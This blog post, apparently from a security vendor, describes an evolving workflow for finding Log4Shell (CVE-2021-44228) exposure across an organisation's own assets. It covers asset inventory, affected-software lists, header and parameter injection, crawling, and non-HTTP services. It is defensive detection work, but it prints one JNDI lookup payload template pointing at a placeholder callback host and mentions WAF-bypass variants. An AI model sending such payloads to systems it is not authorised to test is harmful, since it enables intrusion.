How to Find Log4j Vulnerabilities in Every Possible Way

Log4shell has received a lot of research interest. Here we share our analysis of its many, many attack vectors.

On December 10th, 2021, the Apache Software Foundation published an update for Log4j 2, patching a critical zero-day vulnerability in Java’s popular logging library. The vulnerability was registered as CVE-2021-44228 with the maximum CVSS score of 10. Because Log4j is a logging library, it is used extensively and in many different ways, which left the exploitation window wide open and allowed many different attack vectors to surface.

In this article, we follow this constant evolution of attack vectors and suggest a framework for finding Log4j vulnerabilities and for handling future incidents of this sort, based on the experience we gained while testing for Log4shell.

Let’s start with a quick introduction on how the vulnerability works, then move on to all the different Log4j tests that were developed by the community.

Log4shell 101

If you’re not familiar with how this vulnerability works, here is what you need to know. An attacker who can control log messages or log message parameters can execute arbitrary code if message lookup substitution is enabled. For more details, check out the LunaSec blog.

The attack vectors and tests followed three main paths:

- Finding ways to get user-controlled input logged

- Bypassing mitigations such as WAF blacklists that were immediately developed by multiple vendors

- Identifying affected third-party software

All three paths had one common goal: to cover as many “log inputs” as possible, which naturally requires awareness of what the attack surface is.

Step 0: Asset Inventory

This is where it all starts. The results of this step directly affect everything we do afterward. I’m not going to expand on this too much here, though. Check out the Inventory project and stay tuned for a future article covering our recon methodology. For this article, we will assume that we have an up-to-date list of our target assets, including domains, subdomains, IP addresses, and URLs.

Identifying Affected Third-Party Software

Several individuals and organizations created projects to track affected software, such as:

- National Cyber Security Center (NCSC-NL)

- Cybersecurity and Infrastructure Security Agency (cisagov)

- SwitHak

Each of these resources has been incredible, and they played a huge role in helping blue teams respond to this vulnerability. We can use all of them for maximum coverage. A simple bash script is enough to fetch the lists from these resources, normalize them, merge them into one mega list, and keep it up to date whenever any of the sublists changes (which happened a lot).
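The normalize-and-merge step can be sketched in a few lines. This is a minimal illustration in Python rather than the bash script mentioned above, and it assumes the lists have already been downloaded and reduced to plain product names; the function names and the sample entries are hypothetical.

```python
import re
from typing import Iterable


def normalize(name: str) -> str:
    """Lowercase a product name and collapse punctuation and whitespace to single spaces."""
    return re.sub(r"[^a-z0-9]+", " ", name.lower()).strip()


def merge_lists(*sources: Iterable[str]) -> list[str]:
    """Merge several product lists into one sorted, de-duplicated list."""
    merged = set()
    for source in sources:
        for entry in source:
            key = normalize(entry)
            if key:  # skip blank lines and entries that normalize to nothing
                merged.add(key)
    return sorted(merged)


if __name__ == "__main__":
    # Made-up entries standing in for two already-fetched sublists.
    list_a = ["Acme Server", "Example-Search"]
    list_b = ["acme  server", "Sample Gateway "]
    for product in merge_lists(list_a, list_b):
        print(product)
```

Re-running the merge whenever a sublist changes keeps the combined list current without any special update logic.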







We can pass our asset inventory list to a fingerprinting tool like WhatWeb or Nuclei (with tech detection templates) to find the software used on each host.

This tech data can then be cross-referenced against the affected software list to quickly find the affected hosts.
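A rough sketch of that cross-referencing step, assuming the fingerprinting output has already been parsed into a mapping of host to detected technology names (the parsing depends on the tool and is not shown). The function name and sample data are hypothetical.

```python
def find_affected_hosts(
    host_tech: dict[str, set[str]], affected: set[str]
) -> dict[str, set[str]]:
    """Return the hosts whose detected technologies overlap the affected list."""
    affected_lower = {name.lower() for name in affected}
    hits = {}
    for host, techs in host_tech.items():
        # Compare case-insensitively; real data may need fuzzier matching.
        overlap = {tech.lower() for tech in techs} & affected_lower
        if overlap:
            hits[host] = overlap
    return hits


if __name__ == "__main__":
    detected = {
        "app.example.com": {"Acme Server", "nginx"},
        "static.example.com": {"nginx"},
    }
    for host, techs in find_affected_hosts(detected, {"acme server"}).items():
        print(host, sorted(techs))
```

Exact-name matching is the simplest choice here; product names rarely agree across sources, so a real workflow would likely need the same normalization applied to both sides.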

The Arms Race

If you were on Twitter during the log4j incident, your timeline was probably overflowing with exploits/tests/attack vectors. As mentioned previously, the vulnerability stems from logging attacker-controlled content, so our goal here is to find every possible way to do this and integrate these checks into the workflow.



At first, only “commonly-logged” headers were used to deliver Log4j test vectors: headers that your average developer would want to log. The User-Agent header, for example, is a good candidate. So we just need to find a way to send this header, carrying the payload, to all of our hosts. That’s not too hard, right? A Nuclei template or a well-crafted ffuf command should take care of it.

P.S.: Actually, it’s not that simple; there are some challenges. Scaling out to cover the entire attack surface in a reasonable amount of time is a big one, handling IP blocking is another, and constantly monitoring the attack surface to catch regressions can also be difficult. The list goes on. We’re going to dig deeper into these challenges in future articles; let’s focus on extensibility for now!



But soon enough, attackers started using more headers.

Some people went all in here.



It looks like the previous approach of testing one header wasn’t quite enough, so let’s modify the workflow to read headers from a file instead. This way we can just update the file to add any new headers without touching the workflow logic, which is always a good development practice. The fact that ffuf is such an awesome tool with so many flexible options makes this incredibly easy to do. Huge props to @joohoi and all ffuf contributors!
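The idea of keeping header names in a file, separate from the workflow logic, can be illustrated roughly as follows. This sketch is in Python rather than ffuf, sends nothing over the network, and uses hypothetical function names; the payload is whatever test string the workflow is currently using.

```python
from typing import Iterable


def load_header_names(lines: Iterable[str]) -> list[str]:
    """Read header names from the lines of a file, skipping blanks and # comments."""
    names = []
    for line in lines:
        name = line.strip()
        if name and not name.startswith("#"):
            names.append(name)
    return names


def build_headers(names: Iterable[str], payload: str) -> dict[str, str]:
    """Map every header name to the same test payload."""
    return {name: payload for name in names}


if __name__ == "__main__":
    # In practice these lines would come from open("headers.txt");
    # the file name is an assumption for this example.
    header_file = ["User-Agent", "# added later", "X-Forwarded-For", "Referer", ""]
    print(build_headers(load_header_names(header_file), "TEST_PAYLOAD"))
```

Adding a newly reported header then means appending one line to the file, with no change to the code that builds or sends requests.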

Are headers the only piece of data that gets logged though?



Thanks to the workflow structure we used previously, it shouldn’t be difficult to add JSON payloads. We just need to pass a list of parameters to the create-http-request script node so it can add parameters to the request. The parameters wordlist should ideally be tailored to the target (through a parameter/keyword discovery workflow) but for the sake of simplicity, we will read them from a file.
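As a rough picture of what adding JSON payloads involves, the sketch below turns a list of parameter names into a JSON request body. It is not the create-http-request node itself; the function name and parameter names are hypothetical, and the parameter list would normally be read from the wordlist file.

```python
import json
from typing import Iterable


def build_json_request(params: Iterable[str], payload: str) -> tuple[dict[str, str], str]:
    """Return (headers, body) for a JSON request carrying the payload in every parameter."""
    body = json.dumps({name: payload for name in params})
    headers = {"Content-Type": "application/json"}
    return headers, body


if __name__ == "__main__":
    headers, body = build_json_request(["username", "email"], "TEST_PAYLOAD")
    print(headers)
    print(body)
```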

OK, this probably covers it... or does it?

Crawling makes a lot of sense. So far we’ve been hitting the root page only. Back to the drawing board. Gospider will work pretty well.

Now let’s connect this to ffuf and the rest of the workflow and we should be golden.

Not so fast.



Some events are only logged when an exception occurs; that’s a very good point. We can cover this by modifying the get-urls node to inject some unexpected characters into GET parameters.
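One way to picture that modification: take each crawled URL and append a few unexpected characters to every query parameter value, in the hope of pushing the application into an error path that gets logged. The sketch below is an assumption about how such a step could look, not the actual get-urls node, and the default junk string is arbitrary.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def mutate_query(url: str, junk: str = "'\"[]{}") -> str:
    """Append unexpected characters to every GET parameter value in the URL."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    mutated = [(key, value + junk) for key, value in pairs]
    # urlencode percent-encodes the junk so the request line stays valid.
    return urlunsplit(parts._replace(query=urlencode(mutated)))


if __name__ == "__main__":
    print(mutate_query("https://example.com/search?q=test&page=2"))
```

URLs without a query string pass through unchanged, so the function can be applied to the whole crawl output.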

This workflow should already provide good coverage but is there a way to further improve it?



We have completely overlooked services other than HTTP. Hydra is a good solution here. We can pass our list of payloads to it as a usernames wordlist.

Finally, let’s take a closer look at the payloads file that’s getting passed to every workflow. Up to this point, we’d been using a simple payload that triggered a DNS callback to a ProjectDiscovery Interact.sh server. We created a few variations of this payload based on some research findings to bypass WAFs and so on. Check out some example lists.

The workflow would then read the most recent payloads file every time. This approach was particularly useful because this file changed a lot. For example, we found out that some firewalls (Check Point, Palo Alto, Akamai, etc.) blocked requests containing the string interact.sh (as well as burpcollaborator.net and canarytokens.com), so we had to host our own callback server and adjust the payloads. WAF vendors (such as Cloudflare) were also updating their rulesets constantly to block exploitation attempts, so the payloads list had to be updated with bypasses as well.
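Switching callback servers is easier if the payloads file stores templates rather than finished strings. The sketch below assumes a hypothetical `CALLBACK_HOST` placeholder in each line of the file; the placeholder convention, function name, and example host are illustrative and not part of the original workflow.

```python
from typing import Iterable

PLACEHOLDER = "CALLBACK_HOST"  # hypothetical marker used in the payloads file


def render_payloads(template_lines: Iterable[str], callback_host: str) -> list[str]:
    """Fill the callback host into each payload template, skipping blanks and # comments."""
    payloads = []
    for line in template_lines:
        template = line.strip()
        if not template or template.startswith("#"):
            continue
        payloads.append(template.replace(PLACEHOLDER, callback_host))
    return payloads


if __name__ == "__main__":
    # In practice these lines would be read from the most recent payloads file.
    templates = ["# basic DNS callback", "${jndi:ldap://CALLBACK_HOST/a}"]
    for payload in render_payloads(templates, "callback.example.com"):
        print(payload)
```

Plain string replacement is used instead of `str.format` or `string.Template` because the payloads themselves contain `$` and braces.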

Conclusion

This was a fun ride. New research was getting released constantly and it was freeing to embrace the fact that version 1 of anything is going to suck.

No matter how carefully you try to cover all the bases, new research will happen and you will find out that you (or your security vendor) missed something. So the best way to go about it is to follow the theme of this article: do the best you can with the knowledge you have now and keep iterating. Make it easy for your future self (and your colleagues/clients) to extend and improve the work that you have done.

Cookie-cutter solutions fall short in a lot of areas. If something is missing, or if any particular detail about your environment requires a different scanning strategy, you can always register on Trickest and customize this workflow easily on your own or with the help of our team.
